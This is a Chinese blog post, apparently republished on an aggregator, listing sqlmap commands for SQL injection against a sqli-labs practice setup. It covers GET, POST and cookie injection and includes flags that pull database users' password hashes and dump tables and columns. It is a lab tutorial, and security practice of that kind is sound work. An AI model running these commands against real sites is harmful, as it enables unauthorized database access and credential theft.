2. 程式人生 > 資料庫 >sqlmap命令及引數常規操作

sqlmap命令及引數常規操作

阿新 發佈:2020-12-25

HTTP協議規定post提交的資料必須放在訊息主體(entity-body)中,但協議沒有規定資料必須使用什麼編碼方式。HTTP協議是以ASCII碼傳輸,建立再TCP/IP協議之上的應用層規範。HTTP請求分為3個部分:狀態行、請求頭和訊息主體。類似於:

服務端通常是根據請求頭(header)中的Content_Type欄位來獲取請求中的訊息主體是用何種方式編碼,再對訊息主體進行解析。

SQLmap常規操作

GET形式

Python sqlmap.py -u “http://–url地址–/index.php?id=1” //注入判斷-u:URL地址引數
在這裡插入圖片描述在這裡插入圖片描述python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-1/index.php?id=1” --banner //檢視資料庫版本

在這裡插入圖片描述在這裡插入圖片描述
Python sqlmap.py -u “http://–url地址–/index.php?id=1” --current-user //當前使用者
在這裡插入圖片描述在這裡插入圖片描述在這裡插入圖片描述Python sqlmap.py -u “http://–url地址–/index.php?id=1” --password //查詢資料庫使用者密碼
在這裡插入圖片描述在這裡插入圖片描述Python sqlmap.py -u “http://–url地址–/index.php?id=1” --dbs //檢視所有的資料庫
在這裡插入圖片描述在這裡插入圖片描述Python sqlmap.py -u “http://–url地址–/index.php?id=1” --current-db //檢視當前的資料庫
在這裡插入圖片描述在這裡插入圖片描述
Python sqlmap.py -u “http://–url地址–/index.php?id=1” --tables //檢視所有的表

在這裡插入圖片描述在這裡插入圖片描述Python sqlmap.py -u “http://–url地址–/index.php?id=1” --tables -D A //檢視A庫下的所有表

在這裡插入圖片描述在這裡插入圖片描述Python sqlmap.py -u “http://–url地址–/index.php?id=1” --columns -D A -T B //查詢A庫B表下的所有列

在這裡插入圖片描述Python sqlmap.py -u “http://–url地址–/index.php?id=1” -C “E,F” -D A -T B //匯出欄位裡的內容

在這裡插入圖片描述在這裡插入圖片描述

——POST形式——

Python sqlmap.py -u “http://–url–/” --data “uname=123&passwd=123&submit=Submit” //指定頁面的POST注入

在這裡插入圖片描述
在這裡插入圖片描述
Python sqlmap.py -r “絕對路徑\檔名” --level 3

在這裡插入圖片描述在這裡插入圖片描述
python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-20/index.php” --cookie=“uname=admin” --level 2 //檢測指定cookie欄位進行注入
Python sqlmap.py -r “絕對路徑\檔名.txt”–level 2 //檢測檔案內cookie欄位進行注入
在這裡插入圖片描述
在這裡插入圖片描述
python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-20/index.php” --cookie=“uname=admin” --dbs --level 2
在這裡插入圖片描述在這裡插入圖片描述
python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-1/index.php?id=1” --hostname //檢視主機名

在這裡插入圖片描述在這裡插入圖片描述

相關推薦

sqlmap命令引數常規操作

HTTP協議規定post提交的資料必須放在訊息主體(entity-body)中,但協議沒有規定資料必須使用什麼編碼方式。HTTP協議是以ASCII碼傳輸,建立再TCP/IP協議之上的應用層規範。HTTP請求分為3個部分:狀態行、請求

npm常見命令引數用法

1.npm init [-y]   用來初始化專案,並生成一個package.json檔案,該檔案用來記錄專案的一些基本配置資訊,比如專案版本,專案依賴,等等。該命令有一個可選引數-y,其含義是在專案初始化時,採用系統預設的基本配

Docker相關命令引數

容器 #建立容器的時候指定啟動引數,自動掛載localtime檔案到容器內 docker run --name <name> -v /etc/localtime:/etc/localtime:ro

Sqoop一些常用命令引數

這裡給大家列出來了一部分Sqoop操作時的常用引數,以供參考,需要深入學習的可以參看對應類的原始碼。

Python 獲取命令引數內容引數個數的例項

執行python指令碼的時候,有時需要獲取命令引數的相關資訊。C語言通過argc和argv來獲取引數的個數和引數的內容,python中通過sys模組的argv來獲取引數的內容,使用len(sys.argv)獲取引數的個數。

node.js使用yargs處理命令引數操作示例

本文例項講述了node.js使用yargs處理命令引數。分享給大家供大家參考,具體如下:

淺談Python中os模組shutil模組的常規操作

如下所示: #os.listdir() 方法用於返回指定的資料夾包含的檔案或資料夾的名字的列表。這個列表以字母順序。 它不包括 \'.\' 和\'..\' 即使它在資料夾中。

【Linux】Linux常用命令操作 (一)

一.Linux簡介 二.Linux基礎命令 三.工作常用命令 ----------------------------------------------------------------------------------------------------------------

淺談Python 命令引數argparse寫入圖片路徑操作

什麼是命令引數命令引數是在執行時給予程式/指令碼的標誌。它們包含我們程式的附加資訊,以便它可以執行。

mongodb的常用基礎命令操作

連線檢視資料庫 開啟cmd視窗,輸入mongo進入客戶端模式 show dbs // 檢視所有資料庫show collections // 檢視所有集合use test //use <資料庫名>進入test資料// 新增資料db.test.insert({name:\'aaa\',age:

檔案的常用命令基本操作

1,顯示檔案內容命令——cat、more、less、head、tail Cat命令 cat命令連線檔案並列印到標準輸出裝置上,cat經常用來顯示檔案的內容。n或-number:有1開始對所有輸出的行數編號;

檔案的常用命令基本操作(2)

poweroff 選項 -n:關閉作業系統時不執行sync操作; -w:不真正關閉作業系統,僅在日誌檔案“/var/log/wtmp”中;

php操作redis命令程式碼例項大全

官方PHP Redis擴充套件檔案下載 https://pecl.php.net/package/redis 選擇與你PHP版本相應的檔案下載後直接放到PHP目錄下的ext資料夾裡,然後修改php.ini配置檔案如下

mysql基礎命令基本操作

基礎命令基本操作 基礎命令 show databases;//檢視所有庫 幫助 (help show)(help SHOW CREATE DATABASE)

Python命令引數定義注意事項

  在命令列中執行python程式碼是很常見的,下面介紹如何定義命令後面跟的引數

Python命令引數定義需要注意的地方

  在命令列中執行python程式碼是很常見的,下面介紹如何定義命令後面跟的引數

Linux掛載命令mount用法引數詳解

技術標籤:linux Linux掛載命令mount用法引數詳解 1.掛接命令(mount) 首先,介紹一下掛接(mount)命令的使用方法,mount命令引數非常多 命令格式:mount [-t vfstype] [-o options] device dir 1.-t vfstype 指

git工具常用命令ssh操作方法

目錄git基礎命令暫存,本地倉庫,遠端倉庫,原生代碼拉取其他分支合併分支程式碼提交版本穿梭注意點SSHgit基礎命令

linux-centos-curl命令詳解引數使用

命令:curl詳解引數 https://curl.haxx.se/這是curl的官網。可以從上面的官網地址下載最新的curl版本。同時可以在官網看出curl支援的各種協議(如HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S等)、使用途徑

Windows的命令列執行jmeter指令碼(引數化配置)

背景:在準備除錯完測試指令碼後,在命令列執行指令碼 準備工作:切換到jmeter/bin 目錄下(我這裡未配置jmeter的環境變數)、將指令碼檔案test.jmx 存放在bin目錄